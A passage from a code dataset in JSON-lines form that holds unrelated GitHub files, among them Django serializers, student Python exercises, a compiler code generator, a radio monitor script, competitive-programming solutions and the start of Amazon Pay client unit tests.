'updated_time')\n\n\nclass AnimeOfSubscriptionSerializer(serializers.ModelSerializer):\n seasons = SeasonOfSubscriptionSerializer(many=True)\n\n class Meta:\n model = Anime\n fields = ('id', 'aid', 'name', 'description', 'is_end', 'episode', 'poster_link', 'updated_time', 'seasons')\n\n\n# Subscription serializers\nclass SubscriptionSerializer(serializers.ModelSerializer):\n anime = AnimeOfSubscriptionSerializer()\n\n class Meta:\n model = Subscription\n fields = ('id', 'anime', 'currently_watched', 'status', 'season')\n\n\nclass SubscriptionCreateSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n\n\nclass SubscriptionUpdateSerializer(serializers.ModelSerializer):\n def get_fields(self):\n fields = super(SubscriptionUpdateSerializer, self).get_fields()\n # filter seasons of the anime\n if not self.instance:\n fields['season'].queryset = None\n return fields\n fields['season'].queryset = Season.objects.filter(anime=self.instance.anime)\n return fields\n\n class Meta:\n model = Subscription\n fields = ('id', 'anime', 'currently_watched', 'status', 'season')\n read_only_fields = ('user', 'anime')\n\n\n# Track Serializer\nclass TrackSerializer(serializers.ModelSerializer):\n class Meta:\n model = Track\n fields = ('subscription', 'date_watched', 'status', 'message')\n\n\n# User serializers\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'date_joined', 'is_staff', 'last_login', 'email', 'username')\n read_only_fields = ('date_joined', 'is_staff', 'last_login', 'username')\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n track = TrackSerializer(many=True)\n\n class Meta:\n model = User\n fields = ('id', 'date_joined', 'is_staff', 'last_login', 'username', 'track')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('email', 'username', 'password')\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('password', )\n\n\n# Others\nclass SearchSerializer(serializers.Serializer):\n aid = serializers.IntegerField()\n season_id = serializers.IntegerField()\n name = serializers.CharField()\n description = serializers.CharField()\n episode = serializers.IntegerField()\n poster_link = serializers.URLField()\n updated_time = serializers.DateTimeField()","repo_name":"RicterZ/AnimeReminder","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"869360823","text":"class BankAccount:\n\n def __init__(self, in_name, in_number, in_balance):\n if D:\n print(\"name = {} \\nnumber={} \\nbalance = {}\".format(in_name, in_number, in_balance))\n\n self.balance = in_balance\n self.name = in_name\n self.number = in_number\n\n def withdraw(self, in_amount):\n if D:\n print(\"현재 찾는 금액 = {} \\n찾는 금액 amount = {}\".format(self.balance, in_amount))\n self.balance -= in_amount #self.amount = in_amount 를 안하는 이유\n \n if D:\n print(\"인출 후 self.balance = \", self.balance)\n return self.balance\n\n def deposit(self, in_amount):\n if D:\n print(\"in_amount =\", )\n self.balance +=in_amount\n if D:\n print(\"d2) self.balance =\", self.balance)\n\n return self.balance\n\nclass SavingAccount(BankAccount):\n\n def __init__(self, in_name, in_number, in_balance, in_interest_rate):\n if D:\n print(\"\\nsa_i)name = \", in_name)\n print(\"sa_i) number = \", in_number)\n print(\"sa_i) balance =\", in_balance)\n print(\"sa_i)interest_rate = \", in_interest_rate)\n\n super().__init__(in_name, in_number, in_balance)\n self.in_interest_rate = in_interest_rate\n\n def set_interest_rate(self, in_interest_rate):\n self.in_interest_rate = in_interest_rate\n if D:\n print(\"set_int) self.interest_rate =\", self.in_interest_rate)\n\n def get_interest_rate(self):\n if D:\n print(\"get_int) self.interest_rate =\", self.in_interest_rate)\n return self.in_interest_rate\n \n def add_interest(self):\n self.balance += self.balance * self.in_interest_rate\n if D:\n print(\"add_int) self.balance =\", self.balance)\n\nclass CheckingAccount(BankAccount):\n\n def __init__(self, in_name, in_number, in_balance):\n if D:\n print(\"\\ncai_1) name = {}, number = {}, balance = {}\" .format(in_name, in_number, in_balance))\n super().__init__(in_name, in_number, in_balance)\n\n\n self.withdraw_charge = 10000\n if D:\n print(\"\\ncai_2) 수표 발행 수수료 = \", self.withdraw_charge)\n\n def withdraw(self, in_amount):\n if D:\n print(\"\\ncaw) amount =\", in_amount)\n\n return BankAccount.withdraw(self, in_amount + self.withdraw_charge)\n\n def deposit(self, in_amount):\n if D:\n print(\"\\ncade) amount = \", in_amount)\n return BankAccount.deposit(self, in_amount)\n\nclass Debugging_option:\n\n def __init__(self, option):\n self.debug_option = option\n\n def in_option(self):\n self.debug_option = input(\"Debugging을 원하시나요? (y or n): \")\n return self.debug_option\n\n#main\ndebug = Debugging_option(\"n\")\n\ndep_option = debug.in_option()\n\nif dep_option == \"y\":\n D = True\n print(\"1) deb_option =\", dep_option)\nelse:\n D = False\n\nif D:\n print(\"2) SavingAccount class의 객체 생성\")\nsavings_acc = SavingAccount(\"김국민\", 20213011, 10000, 0.05)\n\nsavings_acc.get_interest_rate()\nsavings_acc.add_interest()\nprint(\"3)저축 예금의 잔액 = \", savings_acc.balance)\n\nif D:\n print(\"\\n4) SavingAccount 금리 변경 인하 : 0.05% --> 0.03%\")\n\nsavings_acc.set_interest_rate(0.03)\nsavings_acc.get_interest_rate()\nsavings_acc.add_interest()\nprint(\"3) 저축예금의 잔액 = \",savings_acc.balance)\n\n\n\n\n","repo_name":"clark1015/python_study","sub_path":"과소사/module.practice/class/personClass.py","file_name":"personClass.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19057386940","text":"from ..Semantic.c3d_generator import C3DGenerator\nfrom ..Semantic.exception import CompilerException\nfrom ..Semantic.symbol_table import SymbolTable\nfrom ..Abstract.abstract import Abstract\nfrom ..Instruction.reserved_return import ReservedReturn\nfrom ..Instruction.reserved_continue import ReservedContinue\nfrom ..Instruction.reserved_break import ReservedBreak\n\nclass IfSentence(Abstract):\n\n def __init__(self, condition, ifBlock, elseBlock, elseIfBlock, line, column):\n super().__init__(line, column)\n self.condition = condition\n self.ifBlock = ifBlock\n self.elseBlock = elseBlock\n self.elseIfBlock = elseIfBlock\n \n\n def execute(self, tree, table):\n callGenerator=C3DGenerator()\n generator=callGenerator.getGenerator()\n generator.addNewComment('Start conditional if')\n condition = self.condition.execute(tree, table) # True o False\n if isinstance(condition, CompilerException) : return condition\n\n if condition.getType() == 'boolean':\n generator.defineLabel(condition.getLabelTrue())\n entorn = SymbolTable(table) #New entorn\n for instruction in self.ifBlock:\n entorn.labelBreak = table.labelBreak#exit of all if\n entorn.labelContinue = table.labelContinue#continue with the if\n entorn.labelReturn = table.labelReturn#return data\n valueInstruction = instruction.execute(tree, entorn)#execute de instruction\n if isinstance(valueInstruction, CompilerException):\n tree.setExceptions(valueInstruction)\n if isinstance(valueInstruction, ReservedBreak):\n if table.labelBreak != '':\n generator.addGotoLabel(table.labelBreak)#goto{table.labelBreak}\n else:\n leave = generator.addNewLabel()#add new label (leave)\n generator.addGotoLabel(leave)#goto{leave(the new label)}\n generator.defineLabel(valueInstruction.getLabel())#L(valueInstruction.label):\n generator.defineLabel(leave)#Lleave:\n return CompilerException(\"Semantico\", \"Error: Break fuera de la instancia\", self.line, self.column)\n if isinstance(valueInstruction, ReservedContinue):\n if table.labelContinue != '':\n generator.addGotoLabel(table.labelContinue)#goto{table.labelContinue}\n else:\n gotoContinue = generator.addNewLabel()#add new label (gotocontinue)\n generator.addGotoLabel(gotoContinue)#goto{gotoContinue}\n generator.defineLabel(condition.getLabelFalse())#label condition.labelFalse\n generator.defineLabel(gotoContinue)#gotoContinue:\n return CompilerException(\"Semantico\", \"Error: Continue fuera de la instancia\", self.line, self.colum)\n if isinstance(valueInstruction, ReservedReturn):#if is instance ofreturn\n if entorn.labelReturn != '':\n generator.addNewComment('Return data for the function')\n if valueInstruction.getLabelTrue() == '':#verify getLabel, if is '' set the stack with valueInstruction\n generator.setStack('P', valueInstruction.getValue())\n generator.addGotoLabel(entorn.labelReturn)#Add gotolabel return label\n else:\n generator.defineLabel(valueInstruction.getLabelTrue())#if exist, define my label true\n generator.setStack('P', '1')#set the stack in the position 1\n generator.addGotoLabel(entorn.labelReturn)#return label and define label to label false\n generator.defineLabel(valueInstruction.getLabelFalse())\n generator.setStack('P', '0')\n generator.addGotoLabel(entorn.labelReturn)#set stack =0 and goto label to return label\n generator.addNewComment('End return data for the function')\n #greate label to leave\n leave = generator.addNewLabel()\n generator.addGotoLabel(leave)\n generator.defineLabel(condition.getLabelFalse())\n if self.elseBlock != None:\n entorn = SymbolTable(table) #New entorn\n for instruction in self.elseBlock:#instruction for block else\n entorn.labelBreak = table.labelBreak#exit of all else\n entorn.labelContinue = table.labelContinue#continue with the else\n entorn.labelReturn = table.labelReturn#return data\n valueInstruction = instruction.execute(tree, entorn)#execute de instruction\n if isinstance(valueInstruction, CompilerException):\n tree.setExceptions(valueInstruction)\n if isinstance(valueInstruction, ReservedReturn):#if is instance of reserved return\n generator.addNewComment('Return data for the function')\n if valueInstruction.getLabelTrue() == '':#if labeltrue ='' set the stack with instruction value\n generator.setStack('P', valueInstruction.getValue())\n generator.addGotoLabel(entorn.labelReturn)#add goto label to return label\n else:\n generator.defineLabel(valueInstruction.getLabelTrue())#define label with instruction for label true\n generator.setStack('P', '1')#set the stack with 1\n generator.addGotoLabel(entorn.labelReturn)#add goto label to return label\n generator.defineLabel(valueInstruction.getLabelFalse())#define\n generator.setStack('P', '0')#set the stack to 0 and goto label to return label\n generator.addGotoLabel(entorn.labelReturn)\n generator.addNewComment('End return data for the function')\n elif self.elseIfBlock != None:#obtain instruction for block else if\n resultElseIf = self.elseIfBlock.execute(tree,table)\n if isinstance(resultElseIf, CompilerException): return resultElseIf\n generator.defineLabel(leave)#define my lave for leave, L#:\n generator.addNewComment('End conditional if')\n\n","repo_name":"MarianoFrancisco/PyTypeCraft","sub_path":"backendc3d/src/Instruction/if_declaration.py","file_name":"if_declaration.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44891791866","text":"# Autor: Jakub Svajka\n# Datum: 22.3.2020\n\nimport DABplus\nimport fileHandler\nimport subprocess\n\n# Getting frequency\nf = fileHandler.getConfig()[0]\n# Getting corresponding channel\nch = fileHandler.DABchannels[f]\n\n# Loading kernel module\nsdr = DABplus.RtlSdr()\n# Check bandwidth before start of welle-cli\nbandwidth = DABplus.checkBandwidth(sdr, f)\n# Unloading kernel module\nsdr.close()\n\nif True:\n \n range = 1000\n if (1536000 - range < bandwidth < 1536000 + range):\n cmd = \"nohup ~/welle-cli -c \" + ch + \" >/dev/null 2>&1 &\"\n # Executing command - oppening pipe\n subprocess.run(cmd, shell=True)\n else:\n print(\"Bandwidth is not in the range. Aborting!\")\nelse:\n fileHandler.wFile(\"/home/pi/DABreceiver/python/bandwidth.txt\", bandwidth)","repo_name":"straker741/DABreceiver","sub_path":"python/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20226829474","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n\ndef donothing():\n print(\"doing nothing\")\n\n#-------------------Main Menu-------------------#\n\nmenu = Menu(root)\nroot.config(menu=menu)\n\nsubMenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=subMenu)\nsubMenu.add_command(label=\"new project\", command=donothing)\nsubMenu.add_command(label=\"one project\", command=donothing)\nsubMenu.add_separator()\nsubMenu.add_command(label=\"separator here\", command=donothing)\nsubMenu.add_command(label=\"Exit\", command=donothing)\n\neditMenu = Menu(menu)\nmenu.add_cascade(label=\"Edit\",menu=editMenu)\neditMenu.add_command(label=\"undo\", command=donothing)\n\n#--------------------Toolbar--------------------#\n\ntoolbar = Frame(root, bg=\"blue\")\n\ninsertBnt = Button(toolbar, text=\"Insert Image\", command=donothing)\ninsertBnt.pack(side=\"left\", padx=2, pady=2)\nprintBtn = Button(toolbar, text=\"Print\", command=donothing)\nprintBtn.pack(side=\"left\", padx=2, pady=2)\n\ntoolbar.pack(side=\"top\", fill=\"x\")\n\n#--------------------StatusBar--------------------#\n\nstatus = Label(root, text=\"Preparing to do nothing\", bd=\"1\", relief=\"sunken\", anchor=\"w\")\nstatus.pack(side=\"bottom\", fill=\"x\")\n\n#-------------------Message Box-------------------#\n\n\nmessagebox.showinfo('Windows Title', 'I don\\'t have any fun fact...!')\n\nanswer = messagebox.askquestion('First Question', 'Click anything Yes OR No ?')\n\nif answer == 'yes':\n print(\"YES\")\nif answer == 'no':\n print(\"NO\")\n\n\n\nroot.mainloop()\n","repo_name":"KalpIC/Tkinter_practice","sub_path":"venv/tkinter_frame_for_all.py","file_name":"tkinter_frame_for_all.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37336316083","text":"from kunquat.tracker.ui.qt import *\n\nfrom .connectionseditor import ConnectionsEditor\nfrom .keyboardmapper import KeyboardMapper\nfrom .saverwindow import SaverWindow\nfrom .updater import Updater\n\n\nclass ConnectionsWindow(Updater, SaverWindow):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self._conns_editor = ConnectionsEditor()\n\n self._keyboard_mapper = KeyboardMapper()\n\n self.add_to_updaters(self._conns_editor, self._keyboard_mapper)\n\n self.setWindowTitle('Connections')\n\n v = QVBoxLayout()\n v.setContentsMargins(0, 0, 0, 0)\n v.setSpacing(0)\n v.addWidget(self._conns_editor)\n self.setLayout(v)\n\n def closeEvent(self, event):\n event.ignore()\n visibility_mgr = self._ui_model.get_visibility_manager()\n visibility_mgr.hide_connections()\n\n def sizeHint(self):\n return QSize(800, 600)\n\n def keyPressEvent(self, event):\n if not self._keyboard_mapper.process_typewriter_button_event(event):\n super().keyPressEvent(event)\n\n def keyReleaseEvent(self, event):\n if not self._keyboard_mapper.process_typewriter_button_event(event):\n event.ignore()\n\n\n","repo_name":"Jasu/kunquat","sub_path":"kunquat/tracker/ui/views/connectionswindow.py","file_name":"connectionswindow.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24681482921","text":"class tanc:\r\n def __init__(self, tanc, lany, fiu):\r\n self.tanc=tanc\r\n self.lany=lany\r\n self.fiu=fiu\r\n \r\n def __str__(self):\r\n return \"Tánc: {}, Lány: {}, Fiú: {}.\".format(self.tanc,self.lany,self.fiu)\r\n\r\n def isVilma(self):\r\n return self.lany==\"Vilma\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nf=open(\"tancrend.txt\")\r\n\r\nsorok=[]\r\n\r\n#2.mego\r\n\r\ntancok2=[]\r\ntemp=[]\r\n\r\nfor e in f:\r\n sorok.append(e.strip())\r\n #2.mego\r\n if len(temp)<3:\r\n temp.append(e)\r\n else:\r\n tancok2.append(tanc(temp[0],temp[1],temp[2]))\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#1.mego\r\ntancok=[]\r\n\r\nfor i in range(len(sorok)//3):\r\n tancc=sorok[i*3]\r\n lany=sorok[i*3+1]\r\n fiu=sorok[i*3+2]\r\n tancok.append(tanc(tancc, lany, fiu))\r\n\r\nprint(tancok)\r\n\r\n\r\nprint(\"2. feladat\")\r\nprint(\"Első tánc: {}, utolsó tánc: {}\".format(tancok[0].tanc, tancok[-1].tanc))\r\n\r\ndb=0\r\nfor egyTanc in tancok:\r\n if egyTanc.tanc==\"samba\":\r\n db+=1\r\n\r\nprint(\"3.feladat\")\r\nprint(\"Ennyi pár mutatta be a sambát: {}\".format(db))\r\n\r\n\r\nprint(\"4.feladat\")\r\nprint(\"Vilma ezekben szerepelt:\")\r\n\r\nfor egyTanc in tancok:\r\n if egyTanc.isVilma():\r\n print(egyTanc.tanc)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"flowerjazmin/python2022","sub_path":"2023.05/latin_tanc/tanciskola.py","file_name":"tanciskola.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121525266","text":"# https://atcoder.jp/contests/past202104-open/submissions/22052173\n# G - 一日一歩\nimport sys\nfrom heapq import *\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nMOD = 10 ** 9 + 7\n\n\nclass UnionFind:\n def __init__(self, n):\n self.n = n\n self.par = [-1] * n\n self.wei = [0] * n\n\n def find(self, x):\n if self.par[x] < 0:\n return x\n else:\n y = self.find(self.par[x])\n self.wei[x] += self.wei[self.par[x]]\n self.par[x] = y\n return y\n\n def union(self, x, y, w=0):\n w += self.weight(x) - self.weight(y)\n x = self.find(x)\n y = self.find(y)\n if x == y:\n return False\n if self.par[x] > self.par[y]:\n x, y = y, x\n w *= -1\n self.par[x] += self.par[y]\n self.par[y] = x\n self.wei[y] = w\n return True\n\n def same(self, x, y):\n return self.find(x) == self.find(y)\n\n def size(self, x):\n return -self.par[self.find(x)]\n\n def weight(self, x):\n self.find(x)\n return self.wei[x]\n\n def diff(self, x, y):\n return self.weight(y) - self.weight(x)\n\n def kruskal(self, edge):\n edge.sort()\n cost_sum = 0\n for cost, node1, node2 in edge:\n if not self.same(node1, node2):\n cost_sum += cost\n self.union(node1, node2)\n return cost_sum\n\n\ndef solve():\n n, m, q = map(int, input().split())\n edge = [[] for _ in range(n)]\n for _ in range(m):\n a, b, c = map(int, input().split())\n edge[a - 1].append([c, b - 1])\n edge[b - 1].append([c, a - 1])\n X = list(map(int, input().split()))\n\n uf = UnionFind(n)\n que = []\n for d, u in edge[0]:\n heappush(que, (d, u))\n\n for i in range(q):\n x = X[i]\n tmp = []\n while que and que[0][0] <= x:\n _, v = heappop(que)\n if not uf.same(0, v):\n uf.union(0, v)\n for d, u in edge[v]:\n if not uf.same(0, u):\n tmp.append((d, u))\n for d, u in tmp:\n heappush(que, (d, u))\n print(uf.size(0))\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/PAST006/PAST006_G.py","file_name":"PAST006_G.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19696684196","text":"from collections import defaultdict\n\ndef max_k_sum_pairs(nums, K):\n count = defaultdict(int)\n pair_count = 0\n\n for num in nums:\n complement = K - num\n\n if count[complement] > 0:\n pair_count += count[complement]\n count[complement] -= 1\n\n count[num] += 1\n\n return pair_count\n\narray = [1, 2, 3, 4, 5]\nK = 6\nresult = max_k_sum_pairs(array, K)\nprint(result) ","repo_name":"AbhiGol/Leet-Code","sub_path":"Python/42. Max Number of K-Sum Pairs/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21416234349","text":"# Задача №2\n# Создать текстовый файл (не программно),\n# сохранить в нем несколько строк,\n# выполнить подсчет количества строк,\n# количества слов в каждой строке.\n\n\ndef calc_lines_words(file_path):\n\n result = dict()\n line_num = 0\n try:\n with open(file_path, 'r') as f:\n for line_num, fl in enumerate(f, 1):\n result[line_num] = len(fl.split())\n except Exception as err:\n print(err)\n return line_num, result\n\n\nif __name__ == '__main__':\n num, counts = calc_lines_words('task2.txt')\n print(f'Found {num} line(s)')\n for k, v in counts.items():\n print(f'Line {k}: {v} word(s)')\n","repo_name":"Tamutnih/homework6","sub_path":"task2_2.py","file_name":"task2_2.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2864816197","text":"from collections import defaultdict, deque\nfrom enum import Enum\nfrom intcode import Intcode\n\nwith open(\"../input/day17.txt\", 'r') as inputFile:\n splitData = inputFile.read().split(\",\")\n data = [int(x) for x in splitData]\n\n\n\nclass Direction(Enum):\n N = 1\n S = 2\n W = 3\n E = 4\n\n def getOpposite(self):\n opposite = [\n Direction.S,\n Direction.N,\n Direction.E,\n Direction.W,\n ]\n return opposite[self.value - 1]\n\n def getNext(self):\n nextVal = [\n Direction.E,\n Direction.W,\n Direction.N,\n Direction.S\n ]\n return nextVal[self.value - 1]\n\nclass Point:\n x: int\n y: int\n\n def __init__(self, x:int, y:int):\n self.x = x\n self.y = y\n\n @classmethod\n def Create(cls, point):\n return Point(point.x, point.y)\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __add__(self, other):\n return Point(x=(self.x+other.x), y=(self.y+other.y))\n\n def __hash__(self):\n return hash(self.x) ^ hash(self.y)\n\n def __repr__(self):\n return f\"Point(x={self.x}, y={self.y})\"\n\n def move(self, dir: Direction):\n movement = {\n Direction.N: Point(x=0, y=-1),\n Direction.S: Point(x=0, y=1),\n Direction.W: Point(x=-1, y=0),\n Direction.E: Point(x=1, y=0),\n }\n return self + movement[dir]\n\n def getAllSurroundingPos(self):\n return [self.move(x) for x in (Direction.N, Direction.S, Direction.W, Direction.E)]\n\n def getDirToPoint(self, other):\n if self.x < other.x:\n return Direction.W\n elif self.x > other.x:\n return Direction.E\n elif self.y < other.y:\n return Direction.S\n else:\n return Direction.N\n\n def getManhattanDist(self, other):\n return abs(self.x - other.x) + abs(self.y - other.y)\n\nclass GridType(Enum):\n UNKNOWN = 0\n SCAFFOLD = 1\n EMPTY = 2\n ROBOT = 3\n\nrunner = Intcode(verbose=False)\nrunner.initProgram(data, stallOnOutput=True)\nrunner.runProgram()\n\ngrid = {}\nstartPos = Point(0, 0)\n\ncurrentX = 0\ncurrentY = 0\n\nwhile runner.eop is False:\n assert(runner.readOutput)\n output = runner.retVal\n if output == 35:\n grid[Point.Create(startPos)] = GridType.SCAFFOLD.value\n startPos = startPos.move(Direction.E)\n elif output == 46:\n grid[Point.Create(startPos)] = GridType.EMPTY.value\n startPos = startPos.move(Direction.E)\n elif output == 10:\n startPos = Point(0, startPos.y + 1)\n else:\n grid[Point.Create(startPos)] = GridType.ROBOT.value\n startPos = startPos.move(Direction.E)\n runner.runProgram()\n\nminX = min([point.x for point in grid.keys()])\nmaxX = max([point.x for point in grid.keys()])\nminY = min([point.y for point in grid.keys()])\nmaxY = max([point.y for point in grid.keys()])\n\ndef printGrid(grid: defaultdict):\n strings = [\n ' ',\n '#',\n '.',\n 'X'\n ]\n for y in range(minY, maxY+1):\n for x in range(minX, maxX+1):\n print(strings[grid[Point(x, y)]], end='')\n print()\n print()\n print()\n\n# Part 1\nintersections = set()\npos: Point\ntype: GridType\nfor pos, type in grid.items():\n if type == GridType.SCAFFOLD.value or type == GridType.ROBOT.value:\n surrounding = pos.getAllSurroundingPos()\n if all([True if x in grid and (grid[x] == GridType.SCAFFOLD.value or grid[x] == GridType.ROBOT.value) else False for x in surrounding]):\n intersections.add(pos)\n\nprint(\"Part1:\", sum([pos.x * pos.y for pos in intersections]))\nprintGrid(grid)\n\n# Part 2\n# NOTE: This is not a generic solver.\npart2 = list(data)\npart2[0] = 2\n\nA = \"L,12,L,10,R,8,L,12\\n\"\nB = \"L,10,R,12,R,8\\n\"\nC = \"R,8,R,10,R,12\\n\"\nMain = \"A,C,A,C,B,B,C,A,C,B\\n\"\n\ninputStream = [ord(x) for x in Main] + [ord(x) for x in A] + [ord(x) for x in B] + [ord(x) for x in C] + [ord('n'), ord('\\n')]\nrunner.initProgram(program=part2, inputStream=inputStream)\nrunner.runProgram()\nassert(runner.eop)\nprint(\"Part2:\", runner.retVal)","repo_name":"pantaryl/adventofcode","sub_path":"2019/src/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74905354065","text":"# 모든 부분 집합을 리턴하라\nnums = [1,2,3]\n\n# dfs와 트리를 사용한 부분집합 리턴\nresult = []\ndef dfs(index, path): \n # 매번 결과 추가\n result.append(path)\n # 경로를 만들면서 DFS\n for i in range(index, len(nums)):\n dfs(i+1, path+ [nums[i]])\ndfs(0,[])\nprint(sorted(result,key=len))\n\n\n\n# itertools와 combinations를 사용한 부분집합 리턴\n# import itertools\n# result = []\n# for i in range(0, len(nums)+1):\n# line = (list(map(list, itertools.combinations(nums,i))))\n# for l in line:\n# result.append(l)\n# print(sorted(result,reverse=True, key=len))\n\n","repo_name":"limnyn/python_codingtest","sub_path":"Algorithm_Interview/37_부분집합.py","file_name":"37_부분집합.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27206061297","text":"import os\nimport sys\nimport json\nimport platform\nimport unittest\nimport xml.etree.ElementTree as et\nimport amazon_pay.ap_region as ap_region\nimport amazon_pay.version as ap_version\nfrom unittest.mock import Mock, patch\nfrom amazon_pay.client import AmazonPayClient\nfrom amazon_pay.payment_request import PaymentRequest\nfrom amazon_pay.payment_response import PaymentResponse, PaymentErrorResponse\nfrom symbol import parameters\n\nclass AmazonPayClientTest(unittest.TestCase):\n\n def setUp(self):\n self.maxDiff = None\n self.mws_access_key = 'mws_access_key'\n self.mws_secret_key = 'mws_secret_key'\n self.merchant_id = 'merchant_id'\n self.service_version = '2013-01-01'\n self.mws_endpoint = \\\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/{}'.format(\n self.service_version)\n\n self.client = AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='na',\n currency_code='USD')\n\n self.request = PaymentRequest(\n params={'test': 'test'},\n config={'mws_access_key': self.mws_access_key,\n 'mws_secret_key': self.mws_secret_key,\n 'api_version': '2013-01-01',\n 'merchant_id': self.merchant_id,\n 'mws_endpoint': self.mws_endpoint,\n 'headers': {'test': 'test'},\n 'handle_throttle': True})\n\n self.response = PaymentResponse('<test>الفلانية فلا</test>')\n self.supplementary_data = '{\"AirlineMetaData\" : {\"version\": 1.0, \"airlineCode\": \"PAX\", \"flightDate\": \"2018-03-24T20:29:19.22Z\", \"departureAirport\": \"CDG\", \"destinationAirport\": \"LUX\", \"bookedLastTime\": -1, \"classOfTravel\": \"F\", \"passengers\": {\"numberOfPassengers\": 4, \"numberOfChildren\": 1, \"numberOfInfants\": 1 }}, \"AccommodationMetaData\": {\"version\": 1.0, \"startDate\": \"2018-03-24T20:29:19.22Z\", \"endDate\": \"2018-03-24T20:29:19.22Z\", \"lengthOfStay\": 5, \"numberOfGuests\": 4, \"class\": \"Standard\", \"starRating\": 5, \"bookedLastTime\": -1 }, \"OrderMetaData\": {\"version\": 1.0, \"numberOfItems\": 3, \"type\": \"Digital\" }, \"BuyerMetaData\": {\"version\" : 1.0, \"isFirstTimeCustomer\" : true, \"numberOfPastPurchases\" : 2, \"numberOfDisputedPurchases\" : 3, \"hasOpenDispute\" : true, \"riskScore\" : 0.75 }}'\n\n def mock_requests_post(self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<GetBillingAgreementDetailsResponse>\\\n <GetBillingAgreementDetailsResult><BillingAgreementDetails>\\\n <BillingAgreementStatus><State>Draft</State>\\\n </BillingAgreementStatus></BillingAgreementDetails>\\\n </GetBillingAgreementDetailsResult>\\\n </GetBillingAgreementDetailsResponse>'\n mock_response.status_code = 200\n return mock_response\n\n def mock_requests_500_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 500\n return mock_response\n\n def mock_requests_generic_error_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 502\n return mock_response\n\n def mock_requests_503_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 503\n return mock_response\n\n def mock_get_login_profile(self, url, headers, params, verify):\n mock_response = Mock()\n mock_response.json.return_value = {\"aud\": \"client_id\"}\n mock_response.status_code = 200\n return mock_response\n\n def test_sandbox_setter(self):\n self.client.sandbox = False\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments/2013-01-01')\n self.client.sandbox = True\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/2013-01-01')\n \n def test_sanitize_response_data(self):\n current_file_dir = os.path.dirname(__file__)\n test_file_path = os.path.join(current_file_dir, \"log.txt\")\n f = open(test_file_path, \"r\")\n source_text = f.read()\n f.close()\n text = self.request._sanitize_response_data(source_text)\n test_file_path = os.path.join(current_file_dir, \"sanlog.txt\")\n f = open(test_file_path, \"r\")\n san_text = f.read()\n f.close\n self.assertEqual(text, san_text)\n\n def test_region_exception(self):\n with self.assertRaises(KeyError):\n AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='should_throw_exception',\n currency_code='test')\n\n def test_set_endpoint(self):\n self.client._set_endpoint()\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/2013-01-01')\n\n def test_sign(self):\n test_signature = self.request._sign('my_test_string')\n self.assertEqual(\n test_signature,\n 'JQZYxe8EFlLE3XCAWotsn329rpZF7OFYhA8oo7rUV2E=')\n\n def test_application_settings(self):\n client = 